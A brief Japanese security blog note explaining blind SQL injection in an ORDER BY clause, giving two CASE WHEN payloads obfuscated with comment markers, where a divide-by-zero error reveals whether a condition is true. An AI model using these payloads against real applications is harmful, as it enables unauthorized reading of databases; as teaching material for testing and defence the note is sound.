Shinobi Style

Footprint To Marvelous Hacker

ORDER BY句のblind SQL injection

web

result

2つのパターンを試せばOK

1/(case/**/when/**/(1=1)/**/then/**/1/**/else/**/0/**/end)  
1/(case/**/when/**/(1=0)/**/then/**/1/**/else/**/0/**/end)

note

例として下記のSQL 文を考える。ここのidのところにSQL injectionがあるとする。

SELECT * FROM user ORDER BY id DESC;

2つのパターンは分数の計算をしていて、上は1/1,下は1/0となるので下はエラーになる。